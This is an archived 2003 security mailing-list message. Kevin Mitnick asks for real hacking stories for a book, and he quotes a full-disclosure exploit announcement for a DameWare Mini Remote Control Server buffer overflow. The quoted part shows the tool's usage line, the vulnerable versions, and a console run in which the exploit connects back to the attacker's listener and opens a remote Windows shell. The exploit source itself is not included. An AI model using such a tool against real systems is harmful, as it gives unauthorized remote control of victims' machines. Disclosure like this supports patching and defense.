[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <000001c3c688$1ce6b740$d2a1fb0a@safecracker>
From: kmitnick at defthi.com (Kevin Mitnick)
Subject: [Exploit]: DameWare Mini Remote Control Server Overflow Exploit
Hi all!
I'm sorry for my absence from the list for the past few months, but I have
been very busy traveling outside the US, and my mail account was
experiencing problems. Now that I am receiving the messages again, I have
been playing "catch up," by reading the old posts.
I do have some good news, and was hoping that some of you might be able to
assist me. I have been commissioned by Wiley & Sons to write a second book,
which is tentatively titled, "The Art of Intrusion." This book will
chronicle detailed accounts of real, untold hacks by the perpetrators who
did it, and I will provide a security analysis and described how the attack
could be mitigated/prevented in today's environment. I am going to tell the
story from the perpetrator's stance, not just from research obtained from
law enforcement officials and records.
I am looking for former/retired hackers that would be willing to tell me the
details of their sexiest hack. I am not interested in the run-of-the-mill
attacks such as, exploiting RPC DCOM, but rather creative ones that
incorporated technical, physical and/or social engineering aspects.
I am offering $500 for the most provocative story that makes it into the
book, and if the person wishes, we can protect their anonymity by the use of
a handle. All contributors selected for the book, will receive a copy of
both books autographed by the authors.
I should have more information up on FreeKevin.com today, as well as
DefensiveThinking.com. If someone would like to contact me with a story or
a possible lead on a storyteller, please write to me at
hacks@...ensivethinking.com, or call at (310)689-7229. I would appreciate
any assistance you can offer.
All my best,
Kevin Mitnick
-----Original Message-----
From: full-disclosure-admin@...ts.netsys.com
[mailto:full-disclosure-admin@...ts.netsys.com] On Behalf Of Adik
Sent: Friday, December 19, 2003 8:38 AM
To: full-disclosure@...ts.netsys.com; bugtraq@...urityfocus.com
Subject: [Full-Disclosure] [Exploit]: DameWare Mini Remote Control Server
Overflow Exploit
DameWare Mini Remote Control Server Exploit
C:\xploits\dmware>dmware
...oO DameWare Remote Control Server Overflow Exploit Oo...
-( by Adik netmaniac[at]hotmail.KG )-
- Versions vulnerable: <= DWRCS 3.72.0.0
- Tested on: DWRCS ver: 3.72.0.0 Win2k SP3 & WinXP SP1
Usage: dmware <TargetIP> <TargetPort> <YourIp> <YourPort>
eg: dmware 10.0.0.1 6129 10.0.0.2 21
C:\xploits\dmware>dmware 192.168.63.130 6129 192.168.63.1 53
...oO DameWare Remote Control Server Overflow Exploit Oo...
-( by Adik netmaniac[at]hotmail.KG )-
- Versions vulnerable: <= DWRCS 3.72.0.0
- Tested on: DWRCS ver: 3.72.0.0 Win2k SP3 & WinXP SP1
[*] Target IP: 192.168.63.130 Port: 6129
[*] Local IP: 192.168.63.1 Listening Port: 53
[*] Initializing sockets... [ OK ]
[*] Binding to local port: 53... [ OK ]
[*] Setting up a listener... [ OK ]
OS Info : WIN2000 [ver 5.0.2195]
SP String : Service Pack 3
EIP: 0x77db912b (advapi32.dll)
[*] Constructing packet for WIN 2000 SP: 3... [ OK ]
[*] Connecting to 192.168.63.130:6129... [ OK ]
[*] Packet injected!
[*] Connection request accepted: 192.168.63.130:1056
[*] Dropping to shell...
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>exit
exit
[x] Connection closed.
C:\xploits\dmware>
------
cheerz,
Adik
Powered by blists - more mailing lists